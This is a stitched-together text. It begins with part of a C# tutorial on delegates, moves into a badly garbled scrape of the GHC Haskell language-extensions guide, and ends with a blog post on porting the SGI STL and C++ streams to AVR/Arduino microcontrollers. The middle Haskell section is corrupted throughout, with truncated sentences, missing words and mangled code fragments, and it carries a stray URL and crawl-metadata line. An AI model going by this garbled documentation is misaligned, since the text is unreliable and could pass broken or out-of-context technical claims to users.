Everything in the <algorithm> and <functional> headers is available. Sorting, searching etc. It's all there. Have fun!
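A quick taste of what that buys you, as a host-side sketch in standard C++ (the lambda is modern-C++ convenience for the test; on the avr-gcc of this era you would pass a function object instead):

```cpp
#include <algorithm>
#include <vector>

// Sort a vector, then binary-search it and count elements with a predicate.
inline bool algorithmDemo() {
  std::vector<int> v = {9, 3, 7, 1, 5};

  std::sort(v.begin(), v.end());                        // 1 3 5 7 9
  bool found = std::binary_search(v.begin(), v.end(), 7);

  long odd = std::count_if(v.begin(), v.end(),
                           [](int x) { return x % 2 != 0; });

  return found && odd == 5 && v.front() == 1 && v.back() == 9;
}
```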
Arduino Extras
I added in a few extras that will make programming against some of the common Arduino classes more natural in an STL/streams environment.
Hardware serial stream
This allows you to drop the clunky println() calls and use the more elegant streams. The constructor takes an instance of a HardwareSerial class. Arduino users only have Serial. Arduino Mega users have Serial1, Serial2, Serial3. I have added std::crlf to the namespace. This will expand to the two character sequence 13,10.
#include <HardwareSerial.h> #include <serstream> #include <iomanip> // for setprecision() #include <sstream> /* * Run some tests on the hardware serial stream */ static void RunTest() { std::ohserialstream serial(Serial); serial.begin(9600); serial << "Hello world" << std::crlf << "Floating point: " << std::setprecision(3) << 3.14159; } };
LiquidCrystal stream
This allows you to write to an LCD character display using streams.
#include <LiquidCrystal.h> #include <lcdostream> LiquidCrystal lcd(2,3,4,5,6,7); /* * Test the LCD output stream */ struct TestLcdOstream { static void RunTest() { lcd.begin(20,4); std::olcdstream stream(lcd); stream << std::clear() << std::move(5,1) << "Hello World"; } };
I have added two functions to the std namespace: clear() clears the LCD screen and move(col,row) moves the cursor to a position on the display. As you can see from the code you still need to declare an instance of LiquidCrystal and call begin() on it before you can use the stream.
Update: 17th Feb 2012
There is a bug in the STL <string> class affecting version 1.1 and below of this package. You need to download at least 1.1.1 to fix it.
The bug is easily reproduced with a simple sketch:
#include <iterator>
#include <string>

void setup() {
  std::string str("abc");
  str.find_first_not_of("a");
}

void loop() {}
The compiler will spit out a typically cryptic succession of template errors, with the key error being this one:
dependent-name 'std::basic_string::size_type' is parsed as a non-type, but instantiation yields a type c:/program files (x86)/arduino-1.0/ hardware/tools/avr/lib/gcc/../../avr/include/string:1106: note: say 'typename std::basic_string::size_type' if a type is meant
Basically the STL was written a long time ago when C++ compilers were a little more forgiving around dependent types inherited from templates. These days they are rightly more strict and you are forced to explicitly say that you mean a type using the typename keyword.
If you want to fix the bug manually then it's very easy, the solution is to modify the <string> header file on line 1107 from this:
// ------------------------------------------------------------
// Non-inline declarations.

template <class _CharT, class _Traits, class _Alloc>
const typename basic_string<_CharT,_Traits,_Alloc>::size_type
basic_string<_CharT,_Traits,_Alloc>::npos
  = (basic_string<_CharT,_Traits,_Alloc>::size_type) -1;
To this (insert the typename keyword):
// ------------------------------------------------------------
// Non-inline declarations.

template <class _CharT, class _Traits, class _Alloc>
const typename basic_string<_CharT,_Traits,_Alloc>::size_type
basic_string<_CharT,_Traits,_Alloc>::npos
  = (typename basic_string<_CharT,_Traits,_Alloc>::size_type) -1;
For background information about why this happens, click here.
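The rule at work can be shown with a tiny standalone example (the Wrapper type and firstIndex function here are hypothetical, invented for illustration — they are not from the STL source):

```cpp
#include <cstddef>

template <class T>
struct Wrapper {
  typedef std::size_t size_type;   // a nested type that depends on T
};

// Inside a template, Wrapper<T>::size_type is a dependent name, so the
// compiler parses it as a *value* unless 'typename' says it is a type.
// Omitting 'typename' in the cast below is the same mistake as the
// original <string> line, and modern compilers reject it.
template <class T>
typename Wrapper<T>::size_type firstIndex() {
  return (typename Wrapper<T>::size_type) 0;
}
```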
Update June 8th 2016
The source code is now on Github. The introduction of upgrades to the Arduino IDE is surfacing issues with the source code that need to be addressed. Hopefully with the source code now easily available we can work through the issues together.
Hey Everyone,
I need some help with cumulative sum, without using Math class methods.

Here's the question:
Write a method named pow that accepts integers for a base A and an exponent B and computes and returns A^B.
This is what I got so far:
Btw how do i put my code in the "red" box?
Code :
//This is problem #3 on cum. sums. public class Powwow { public static void main(String[] args) { prod = 1; for(int i = 1; i <= 1; i++); System.out.println("prod = prod * a"); } }
Thanks | http://www.javaprogrammingforums.com/%20whats-wrong-my-code/1189-cummulative-sum-prob-need-some-help-printingthethread.html | CC-MAIN-2014-35 | refinedweb | 101 | 85.08 |
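For reference, here is one way the cumulative product can be turned into a working pow method — a sketch, not the only solution. Note the fixes relative to the attempt above: prod is declared, the loop runs up to b (not 1) with no stray semicolon after the for header, and the multiplication happens inside the loop body instead of printing a string literal.

```java
public class Pow {
    // Computes a^b for b >= 0 by accumulating a running (cumulative) product.
    public static int pow(int a, int b) {
        int prod = 1;                // a^0 == 1 before the loop runs
        for (int i = 1; i <= b; i++) {
            prod = prod * a;         // multiply into the accumulator each pass
        }
        return prod;
    }

    public static void main(String[] args) {
        System.out.println("2^8 = " + pow(2, 8));
    }
}
```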
Hoss Man commented on LUCENE-1316:
----------------------------------
bq. Code that depended on deletes being instantly visible across threads would no longer be
guaranteed.
you lost me there ... why would deletes be stop being instantly visible if we changed this...
{code}
public synchronized boolean isDeleted(int n) {
return (deletedDocs != null && deletedDocs.get(n));
}
{code}
...to this...
{code}
public boolean isDeleted(int n) {
if (null == deletedDocs) return false;
synchronized (this) { return (deletedDocs.get(n)); }
}
{code}
?
> Avoidable synchronization bottleneck in MatchAlldocsQuery$MatchAllScorer
> ------------------------------------------------------------------------
>
> Key: LUCENE-1316
> URL:
> Project: Lucene - Java
> Issue Type: Bug
> Components: Query/Scoring
> Affects Versions: 2.3
> Environment: All
> Reporter: Todd Feak
> Priority: Minor
> Attachments: MatchAllDocsQuery.java
>
> Original Estimate: 1h
> Remaining Estimate: 1h
>
> The isDeleted() method on IndexReader has been mentioned a number of times as a potential
> synchronization bottleneck. However, the reason this bottleneck occurs is actually at a higher
> level that wasn't focused on (at least in the threads I read).
> In every case I saw where a stack trace was provided to show the lock/block, higher in
> the stack you see the MatchAllScorer.next() method. In Solr particularly, this scorer is used
> for "NOT" queries. We saw incredibly poor performance (order of magnitude) on our load tests
> for NOT queries, due to this bottleneck. The problem is that every single document is run
> through this isDeleted() method, which is synchronized. Having an optimized index exacerbates
> this issue, as there is only a single SegmentReader to synchronize on, causing a major thread
> pileup waiting for the lock.
> By simply having the MatchAllScorer see if there have been any deletions in the reader,
> much of this can be avoided. Especially in a read-only environment for production where you
> have slaves doing all the high load searching.
> I modified line 67 in the MatchAllDocsQuery
> FROM:
> if (!reader.isDeleted(id)) {
> TO:
> if (!reader.hasDeletions() || !reader.isDeleted(id)) {
> In our micro load test for NOT queries only, this was a major performance improvement.
> We also got the same query results. I don't believe this will improve the situation for indexes
> that have deletions.
> Please consider making this adjustment for a future bug fix
When I run this
from enum import Enum

class MyEnumType(str, Enum):
    RED = 'RED'
    BLUE = 'BLUE'
    GREEN = 'GREEN'

for x in MyEnumType:
    print(x)
I get the following as expected:
MyEnumType.RED
MyEnumType.BLUE
MyEnumType.GREEN
Is it possible to create a class like this from a list or tuple that has been obtained from elsewhere?
Something vaguely similar to this perhaps:
myEnumStrings = ('RED', 'GREEN', 'BLUE')

class MyEnumType(str, Enum):
    def __init__(self):
        for x in myEnumStrings:
            self.setattr(self, x, x)
However, in the same way as in the original, I don’t want to have to explicitly instantiate an object.
Answer
You can use the enum functional API for this:
from enum import Enum

myEnumStrings = ('RED', 'GREEN', 'BLUE')
MyEnumType = Enum('MyEnumType', myEnumStrings)
From the docs:
The first argument of the call to Enum is the name of the enumeration.
The second argument is the source of enumeration member names. It can be a whitespace-separated string of names, a sequence of names, a sequence of 2-tuples with key/value pairs, or a mapping (e.g. dictionary) of names to values. | https://www.tutorialguruji.com/python/create-an-enum-class-from-a-list-of-strings-in-python/ | CC-MAIN-2021-43 | refinedweb | 183 | 58.72 |
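One caveat: passing a plain sequence of names assigns the integer values 1, 2, 3, so the resulting enum does not mix in str the way the original class MyEnumType(str, Enum) did. A sketch that keeps that behavior, using the functional API's (name, value) pairs together with its type keyword argument:

```python
from enum import Enum

myEnumStrings = ('RED', 'GREEN', 'BLUE')

# (name, value) pairs keep each member's value equal to its name,
# and type=str mixes str back in, matching class MyEnumType(str, Enum).
MyEnumType = Enum('MyEnumType', [(s, s) for s in myEnumStrings], type=str)

print(MyEnumType.RED == 'RED')   # True: members compare equal to plain strings
```

Because the members are str subclasses, they can be used anywhere a plain string is expected (e.g. as JSON values or dict keys).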
The following is listed as example in pymysql:
conn = pymysql.connect(...)

with conn.cursor() as cursor:
    cursor.execute(...)
    ...

conn.close()
Can I use the following instead, or will this leave a lingering connection?
(it executes successfully)
import pymysql

with pymysql.connect(...) as cursor:
    cursor.execute('show tables')
(python 3, latest pymysql)
Best answer
This does not look safe. If you look at the pymysql source, the __enter__ and __exit__ functions are what are called in a with clause. For the pymysql connection they look like this:
def __enter__(self):
    """Context manager that returns a Cursor"""
    return self.cursor()

def __exit__(self, exc, value, traceback):
    """On successful exit, commit. On exception, rollback"""
    if exc:
        self.rollback()
    else:
        self.commit()
So it doesn’t look like the exit clause closes the connection, which means it would be lingering. I’m not sure why they did it this way. You could make your own wrappers that do this though.
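To see that concretely, here is a minimal stand-in class (hypothetical, not pymysql — only the method names and the __enter__/__exit__ logic mirror the code quoted above):

```python
# Hypothetical stand-in for pymysql's Connection, wired up with the same
# __enter__/__exit__ logic as above, to show the connection stays open
# after the with-block.
class FakeConnection:
    def __init__(self):
        self.open = True
        self.committed = False

    def cursor(self):
        return object()          # dummy cursor; pymysql returns a real Cursor

    def commit(self):
        self.committed = True

    def rollback(self):
        pass

    def close(self):
        self.open = False

    def __enter__(self):
        """Context manager that returns a Cursor"""
        return self.cursor()

    def __exit__(self, exc, value, traceback):
        """On successful exit, commit. On exception, rollback"""
        if exc:
            self.rollback()
        else:
            self.commit()

conn = FakeConnection()
with conn as cursor:
    pass

print(conn.committed, conn.open)  # True True -- committed, but never closed
```

The real pymysql classes differ in the details, but the control flow is the same: __exit__ commits or rolls back and never calls close().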
You could recycle a connection by creating multiple cursors with it. In the pymysql cursor source, the corresponding methods look like this:
def __enter__(self):
    return self

def __exit__(self, *exc_info):
    del exc_info
    self.close()
So they do close themselves. You could create a single connection and reuse it with multiple cursors in with clauses.

If you want to hide the logic of closing connections behind a with clause, e.g. a context manager, a simple way to do it would be like this:
from contextlib import contextmanager
import pymysql

@contextmanager
def get_connection(*args, **kwargs):
    connection = pymysql.connect(*args, **kwargs)
    try:
        yield connection
    finally:
        connection.close()
You could then use that context manager like this:
with get_connection(...) as con:
    with con.cursor() as cursor:
        cursor.execute(...)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.